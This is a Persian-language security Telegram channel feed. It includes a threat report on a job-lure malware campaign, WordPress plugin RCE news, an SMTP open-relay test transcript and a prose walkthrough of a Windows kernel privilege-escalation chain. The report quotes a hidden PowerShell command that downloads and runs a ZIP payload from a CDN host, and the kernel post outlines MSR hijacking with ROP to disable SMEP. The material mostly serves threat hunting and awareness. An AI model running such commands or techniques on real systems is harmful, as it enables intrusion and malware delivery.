📃 طبق این گزارش مهاجم از یه فایل LNK مخرب برای اجرای یه دستور مخفی PowerShell استفاده کرده که یه سند PDF جعلی (lure) و یه فایل ZIP دیگه رو از آدرس Bunny CDN دانلود میکنه:

powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try { iwr 'hxxps://555555cnd.b-cdn[.]net/Marriott_Marketing_Job_Denoscription.pdf' -OutFile 'C:\Users\Public\Marriott.pdf'; Start-Process 'C:\Users\Public\Marriott.pdf'; Start-Sleep -Seconds 3; iwr 'hxxps://555555cnd.b-cdn[.]net/002.zip' -OutFile 'C:\Users\Public\002.zip'; Expand-Archive -Path 'C:\Users\Public\002.zip' -DestinationPath 'C:\Users\Public' -Force; Start-Process 'C:\Users\Public\XtraViewer.exe' -ArgumentList '/silent_start' } catch {}"

با وجود اینکه این دستور خیلی رایجه و به‌راحتی میشه کشفش کرد، استفاده از Bunny CDN جالب به نظر میرسه. و البته، ما میتونیم ازش برای شکار (hunting) استفاده کنیم:

event_type: "dnsreqwin"

AND

dns_rname: "b-cdn.net"

@TryHackBox
#LNKMalware #PowerShell #Malicious

خلاصه کوتاه

گروه تهدیدی که محققان آن را BatShadow نامیده‌اند، با یک کمپین هدفمند به دنبال جذب و آلوده‌سازی افراد شاغل در حوزه‌های دیجیتال (مثل جویندگان کار و دیجیتال مارکترها) است. آنها از مهندسی اجتماعیِ دقیق (آگهی‌های شغلی/لینک‌های جعلی) استفاده می‌کنند و فایل‌های ZIP حاوی اسناد طعمه و یک فایل مخفی .LNK یا .exe را به قربانی می‌رسانند. پس از اجرا، یک باینری نوشته‌شده با Go (که محققان آن را «Vampire bot» می‌نامند) نصب می‌شود و با ویژگی‌های زیر رفتار می‌کند:

شناسایی و پروفایل کامل میزبان (HWID، یوزرنیم، OS، آنتی‌ویروس‌های نصب‌شده، آی‌پی‌ها و غیره).

ارسال یک beacon اولیه رمزنگاری‌شده (JSON) به C2 با اطلاعات کامل.

گرفتن اسکرین‌شات‌های دوره‌ای (real-time desktop capture) با استفاده از کتابخانه‌ی Go (kbinani) و ذخیره به‌صورت WEBP.

رمزنگاری داده‌ها با AES-CBC (کلید از یک UUID سخت‌کدشده مشتق می‌شود) و فرستادن آنها داخل ترافیک HTTPS به سرورهای C2 (مثلاً endpointهایی مثل api3.samsungcareers.work/api/...).

یک حلقهٔ دائمی C2 برای دریافت دستورات (download/execute، تغییر تنظیمات captureInterval/captureQuality و …).

پنهان‌سازی و تداوم: کپی خود به مسیرهای مخفی (مثلاً داخل AppData\Local\Packages\edge)، ایجاد mutex و استفاده از ابزارهای قانونی مانند XtraViewer برای پنهان‌سازی کنترل از راه دور.

Aryaka Unified SASE Solution For Secure

نحوهٔ نفوذ و ترفندهای اجتماعی (لِیِر)

طعمه‌ها معمولاً با ZIP حاوی چند PDF و یک فایل LNK که شبیه PDF است فریب داده می‌شوند.

لینک‌های فیک به صفحات شغلی جعلی هدایت می‌کنند که قربانی را ترغیب می‌کنند فایل را «در Edge» باز کند — این ترفند برای دورزدن جلوگیری‌گرهای مرورگر انجام می‌شود.

بعد از کلیک، payload از CDN دانلود و اجرا می‌شود.

Aryaka Unified SASE Solution For Secure

تکنیک‌های فنی برجسته

زبان Go برای ساخت باینری (cross-platform، سخت‌تر برای آنتی‌ویروس‌ها).

AES-CBC با کلید مشتق‌شده از UUID سخت‌کدشده؛ انتقال در قالب JSON با IV+ciphertext هِگز‌شده.

تصاویر WEBP برای اسکرین‌شات‌ها (حجم کم، مخفی‌سازی بهتر).

C2 over HTTPS با هدر X-Api-Key که همان UUID است — ترافیک شبیه ترافیک معمول HTTPS به‌نظر می‌رسد.

Aryaka Unified SASE Solution For Secure

شاخص‌های سازش (IoC) — نمونه‌ها (از گزارش)

نام‌‌‌های فایل/ZIP مانند: ATG_Technology_Group_Marketing_Job_Denoscription.zip, Marriott_Marketing_Job_Denoscription.zip

دامنه/USB: نمونه endpoint ذکرشده: api3.samsungcareers.work (در گزارش به‌عنوان مقصد C2).

رفتار قابل شناسایی: فرایندهایی که فایل exe را داخل پوشهٔ AppData\Local\Packages\edge ایجاد می‌کنند؛ mutex با نام edge; ترافیک HTTPS با JSON payload حاوی فیلدهای fingerprint.
(برای استخراج کامل IoCها می‌تونم Appendix A در PDF را دقیقاً بیرون بکشم و لیست کامل ارائه کنم).
Aryaka Unified SASE Solution For Secure

تطابق با MITRE ATT&CK (خلاصه)

چند تکنیک اصلی که در گزارش ذکر شده با ماتریکس ATT&CK مطابقت دارد:

Initial Access: Phishing / Spearphishing Attachment (T1566.001)

Execution: User Execution via LNK/EXE (T1204)

Persistence: Masquerading, Service/Startup persistence (T1036, T1547)

Collection: Screen Capture (T1113), System Information Discovery (T1082)

Command and Control: Application Layer Protocol over HTTPS (T1071.001)

Exfiltration: Exfil over C2 channel (T1041)
(گزارش Appendix B نقشهٔ کامل‌تری دارد).
Aryaka Unified SASE Solution For Secure

توصیه‌های دفاعی عملی (عملی و سریع)

کاربر را آموزش بدهید — هشدار دربارهٔ ZIP/PDFهای شغلی و فایل‌های LNK که شبیه PDF نمایش داده می‌شوند.

بلاک کردن و مانیتورینگ دامنه‌ها/CDNهای مشکوک ذکرشده در IoC.

جلوگیری از اجرای فایل‌های LNK از پوشه‌های دانلود/عمومی با سیاست‌های AppLocker/Windows Defender Application Control.

محدودیت استفاده از ابزارهای remote-access (مثل XtraViewer) یا اعمال سیاست MFA، whitelisting و مانیتورینگ نشست‌ها.

EDR/AV را تنظیم کنید تا رفتارهای مشکوک (کپی به AppData\Local\Packages\edge، ساخت mutex، استفاده از کتابخانه kbinani برای اسکرین‌شات) را شناسایی کند.

TLS inspection / proxy برای شناسایی الگوهای JSON مشکوک و X-Api-Keyها (در محیط‌های مجاز)؛ یا لااقل شبکه‌های خروجی را به سرورهای غیرضروری محدود کنید.

بکاپ آفلاین و رمزگذاری دیسک و حفظ دسترسی‌های SSH/credential امن.

⭐️ @RadvanSec

هکرها طی دو روز، ۸.۷ میلیون سایت وردپرسی را هک کردند — حمله از طریق آسیب‌پذیری‌های بحرانی در افزونه‌های محبوب انجام شده است
🗓 تاریخ: ۲۶ اکتبر ۲۰۲۵ | منبع: SecurityLab

یک کارزار بزرگِ سوءاستفاده از آسیب‌پذیری‌ها، سایت‌های وردپرسی را هدف قرار داده است. مهاجمان به سایت‌هایی حمله می‌کنند که افزونه‌های GutenKit و Hunk Companion روی آن‌ها نصب شده است. این افزونه‌ها دارای باگ‌های بحرانی هستند که امکان اجرای کد دلخواه روی سرور (Remote Code Execution) را فراهم می‌کنند.
شرکت Wordfence (متخصص در حفاظت از سایت‌های وردپرسی) اعلام کرده که تنها در دو روز — ۸ و ۹ اکتبر — بیش از ۸.۷ میلیون حمله ثبت شده است.

جزئیات آسیب‌پذیری‌ها

این حملات از سه آسیب‌پذیری با شناسه‌های زیر سوءاستفاده می‌کنند:

CVE-2024-9234

CVE-2024-9707

CVE-2024-11972

تمامی این آسیب‌پذیری‌ها دارای بالاترین سطح خطر (CVSS 9.8) هستند.

🔹 CVE-2024-9234 در افزونه GutenKit (با بیش از ۴۰ هزار نصب فعال) کشف شده است.
این نقص در بخش REST endpoint افزونه قرار دارد و به مهاجم اجازه می‌دهد بدون هیچ مجوزی، افزونه‌های دلخواه خود را از راه دور نصب کند.

🔹 دو مورد دیگر، یعنی CVE-2024-9707 و CVE-2024-11972، در افزونه Hunk Companion (نصب‌شده روی حدود ۸۰۰۰ سایت) وجود دارند.
در این دو آسیب‌پذیری نیز بررسی سطح دسترسی انجام نمی‌شود؛ در نتیجه مهاجم می‌تواند هر افزونه‌ای، حتی افزونه حاوی بدافزار را نصب کند.
پس از نصب افزونه مخرب، مهاجم می‌تواند دستورات دلخواه را روی سرور اجرا کرده و به اجرای کد از راه دور (RCE) دست یابد.

نسخه‌های آسیب‌پذیر

GutenKit: نسخه‌های ۲.۱.۰ و قبل از آن آسیب‌پذیرند.

Hunk Companion: نسخه‌های ۱.۸.۴ و ۱.۸.۵ (و تمام نسخه‌های قبل از آن) دارای نقص هستند.

رفع باگ‌ها مدت‌ها قبل منتشر شده است:

در GutenKit 2.1.1 (اکتبر ۲۰۲۴)

در Hunk Companion 1.9.0 (دسامبر ۲۰۲۴)
اما بسیاری از سایت‌ها هنوز از نسخه‌های قدیمی و آسیب‌پذیر استفاده می‌کنند.

نحوه حمله

طبق گزارش Wordfence، مهاجمان در GitHub آرشیوی به نام up.zip منتشر کرده‌اند که حاوی یک افزونه جعلی است.
درون این فایل، اسکریپت‌های رمزگذاری‌شده‌ای وجود دارد که قابلیت‌های زیر را دارند:

دانلود، حذف یا ویرایش فایل‌ها

مدیریت سطح دسترسی کاربران

یکی از فایل‌های موجود در این بسته، با رمز محافظت شده و در ظاهر شبیه به افزونه‌ی All in SEO است؛ اما در واقع برای ورود خودکار به حساب کاربری ادمین استفاده می‌شود.

پس از نصب این افزونه، مهاجمان دسترسی دائمی به سایت پیدا می‌کنند و می‌توانند:

داده‌ها را سرقت یا دانلود کنند

دستورات سیستم را اجرا کنند

یا اطلاعات خصوصی پردازش‌شده توسط سایت را ردیابی کنند

در صورتی که موفق به نصب بک‌دور کامل نشوند، از افزونه دیگری به نام wp-query-console استفاده می‌کنند که خود دارای آسیب‌پذیری اجرای کد بدون نیاز به احراز هویت است.

علائم آلودگی

Wordfence فهرستی از آدرس‌های IP منتشر کرده است که منبع اصلی این درخواست‌های مخرب هستند (برای فیلتر کردن در سطح سرور قابل استفاده‌اند).
همچنین، کارشناسان پیشنهاد می‌کنند در لاگ‌ها به دنبال درخواست‌های زیر بگردید:

/wp-json/gutenkit/v1/install-active-plugin
/wp-json/hc/v1/themehunk-import

و همچنین پوشه‌های زیر را بررسی کنید:

/up
/background-image-cropper
/ultra-seo-processor-wp
/oke
/wp-query-console

وجود فایل‌های ناشناس در این مسیرها می‌تواند نشانه هک بودن سایت باشد.

منبع خبر : https://www.securitylab.ru/news/565109.php

⭐️ @RadvanSec

⭐️ @RadvanSec

ابزار «SalesQL» یک سرویس آنلاین برای پیدا کردن، استخراج و تأیید اطلاعات تماس (ایمیل، تلفن و …) از شبکه حرفه‌ای LinkedIn و سایر منابع است.
salesql.com

⭐️ @RadvanSec

خوشحال میشم به من بگید
این سبک پاسخ دادن توهین به مخاطب هست؟
این بار پرسش و پاسخ برعکس داریم و من از شما عزیزان میپرسم❤️🙏🏼
شاید واقعا توهین امیزه بوده جوابم خودم نمیدونم
ولی به نظرم اون جوابی بود که خیلیا تو این کامیونیتی باید میگرفتن و نیاز بود محکم گفته بشه


https://www.instagram.com/reel/DQhNpbLjdjX/?igsh=dWZ2dTRrcXI3bXk3

CVE-2025-64095

DNN Unauthenticated arbitrary file upload

Exploit

⭐️ @RadvanSec

ایا بدون تجربه کار میشه حقوق بالا ۵۰ داشت؟ بله میشه
چجوری؟
زمانی که شخص برای کار اماده باشه و صرفا عدم تجربش به دلیل این باشه جایی استخدام نشده تا الان
چجوری اماده بشه؟
حل لب ها و کار روی تارگت ها واقعی
مطالعه زیاد
و حتی انتقال دانش

و از همه مهم تر اماده شدن برای مصاحبه

ولی این وسط افرادی هستند که عاشق نیروی کار ارزونن و اتفاقا این افراد شما رو می بلعن، انگیزه شما رو نابود میکنند
یکی از همین افراد که چندین بار با دانشجویان ما مصاحبه کرد، از روی اتفاق هربارم‌ این جمله رو گفته:
“از نظر من حقوق پیشنهادیت خوبه برای تو ولی احتمالا قبول نکنن چون‌تجربه اولته حالا مت تلاشم رو میکنم”

و نکته جالب اینه که هیچ کدوم از تلاش ها هم به ثمر نرسیده

برای تکمیل صحبت ها این پست لینکدین رو ببینید

https://www.linkedin.com/posts/reza-sharifzade-649a8b18a_%D8%AD%D9%88%D8%A7%D8%B3%D8%AA%D9%88%D9%86-%D8%A8%D9%87-%D8%B4%D8%AF%D8%AA-%D8%A8%D9%87-%D8%A7%D9%81%D8%B1%D8%A7%D8%AF%DB%8C-%D8%A8%D8%A7%D8%B4%D9%87-%DA%A9%D9%87-%D9%85%DB%8C%D8%AE%D9%88%D8%A7%D9%86-%D8%AC%D8%A7-activity-7390621557091561472-5aT2?utm_medium=ios_app&rcm=ACoAACynbdkBjwS7XkCf7Nkb04x0i6a-3_jtLFM&utm_source=social_share_send&utm_campaign=copy_link

ارزون کار نکنید عزیزان
و‌ مراقب افرادی باشید که ارزون کار کردن رو عادی جلوه میدهند

“هوش مصنوعی” واقعا هوش؟ یا مصنوعی؟

⭐️ @RadvanSec

چین و سنگاپور در حال جمع آوری سنگین دیتا از کل اینترنت هستند


طبق داده های سایت تله کانال لینوکسور متوجه شدیم چین با یک مجموعه 60 هزار تایی ربات در حال تغذیه دیتا از سایت ها هستند، این دیتا ها احتمالا برای مدل های هوش مصنوعی جمع آوری می‌شوند.

برای درک عظمت این تعداد، یوزر های آمریکا ربات های گوگل و chatgpt هستند که در مجموع فقط 500 عدد هستند.


@Linuxor

⭐️ @RadvanSec

DirectComposition Vulnerability

Exploit

⭐️ @RadvanSec

بنظرتون چه ریسک امنیتی داره این سرویس ‌؟

➜ ~ swaks --server 194.237.69.170 --to test1@inratt.se --from test2@inratt.se --header "Subject: PoC Open Relay Test" --timeout 30 --protocol SMTP

=== Trying 194.237.69.170:25...
=== Connected to 194.237.69.170.
<-  220 server10.inratt.se Microsoft ESMTP MAIL Service ready at Mon, 3 Nov 2025 09:27:16 +0100
 -> HELO apples-macbook-2.local
<-  250 server10.inratt.se Hello [3.313.2.5]
 -> MAIL FROM:<test@inratt.se>
<-  250 2.1.0 Sender OK
 -> RCPT TO:<tiyed17750@inratt.se>
<-  250 2.1.5 Recipient OK
 -> DATA
<-  354 Start mail input; end with <CRLF>.<CRLF>
 -> Date: Mon, 03 Nov 2025 12:05:10 +0330
 -> To: tiyed17750@inratt.se
 -> From: test@inratt.se
 -> Subject: PoC Open Relay Test
 -> Message-Id: <20251103120510.004312@apples-macbook-2.local>
 -> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
 -> 
 -> This is a test mailing
 -> 
 -> 
 -> .
<-  250 2.6.0 <20251103120510.003801@apples-macbook-2.local> [InternalId=8238] Queued mail for delivery
 -> QUIT
<-  221 2.0.0 Service closing transmission channel
=== Connection closed with remote host.

ملاحظه : ‌سرور تستی هست

اکسپلویت جدید 0day کرنل ویندوز که روی ویندوز 11 نسخه 25H2 کاملا patch کار می کند.

دو هفته بی وقفه قهوه خوردم تا رسیدم به این نتیجه!

اجرای ROP دلخواه در کرنل ویندوز برای تسخیر کنترل نقطه ورود KiSystemCall64 از طریق رجیستر مدل خاص IA32_LSTAR:

مراحل آماده سازی:
تمام آفست ها و گجت ها در زمان اجرا از نقطه شروع یک انفویلیک از آسیب پذیری جداگانه در یک درایور دوم محاسبه می شوند، این مرحله برای مخفی کاری اختیاری است. و اگر برای سادگی در دسترس باشد می توان از EnumDeviceDrivers استفاده کرد اما صدای بیشتری تولید می کند.

راه اندازی درایور: کار را با آدرس مجازی اکسپلویت در یک درایور امضا شده اما آسیب پذیر در حلقه 0 شروع می کنیم. این درایور یا یک دستگاه موجود را باز می کند یا موقتا یکی نصب می کند، دو تا اگر از انفویلیک استفاده شود. از طریق آن درایور ما پرایمیتیوهای خواندن و نوشتن MSR دلخواه را به دست می آوریم.

بهره برداری: در حالی که هنوز در فضای کاربر هستیم مقدار IA32_LSTAR را نشت می دهیم که پل syscall از مود کاربر به مود کرنل را مشخص می کند، سپس پایه ntoskrnl را بازیابی می کنیم. آن یا یک انفویلیک نقطه شروع ما است که با آن آفست گجت های ROP داخل ntoskrnl (مثل pop rcx و mov cr4, rcx و sysret) را پیدا می کنیم و آفست های KPCR لازم برای بازسازی استک کرنل پس از ربودن مسیر syscall را کشف می کنیم.

ربایش MSR: مقدار IA32_LSTAR را طوری می نویسیم که به زنجیره گجت ها اشاره کند به جای KiSystemCall64 اصلی، آفست KiSystemCall64 با استفاده از MSR_READ به دست آمد. هندلر به ترتیب گجت ها منتقل می شود، SMEP را با تغییر موقتی CR4 غیرفعال می کند و سپس به Payload در فضای کاربر که با امتیازات کامل کرنل اجرا می شود جامپ می کند.

Payload: نه تنها یک شلکد ساده! payload در زمان اجرا RtlFindExportedRoutineByName را حل می کند تا هر API کرنلی را که بخواهیم فراخوانی کند مثلا فهرست فرآیندها را بگیرد یا IPI هایی بفرستد تا CR4 را روی هر هسته بخواند یا هر کار دلخواه دیگری انجام دهد. پس از اتمام، آدرس اصلی KiSystemCall64 را دوباره در IA32_LSTAR بازنشانی می کنیم، SMEP را فعال می کنیم و به حالت کاربر بازمی گردیم.

خلاصه: یک اکسپلویت صفر روزه پیدا کردم، آن را با یک انفویلیک ترکیب کردم و در ویندوز 11 کاملا وصله شده اجرا کردم. این یک افزایش امتیاز است که هر پرایمیتیو خواندن یا نوشتن MSR را به اجرای قابل اعتماد در کرنل تبدیل می کند: هدف syscall را نشت کن، ترمپولین را با یک زنجیره گجت مینیمال ربایش کن، کد دلخواه حلقه صفر را اجرا کن، سپس همه چیز را به حالت قبل برگردان تا سیستم طوری رفتار کند که انگار هیچ اتفاقی نیفتاده است.

Linkedin

⭐️ @RadvanSec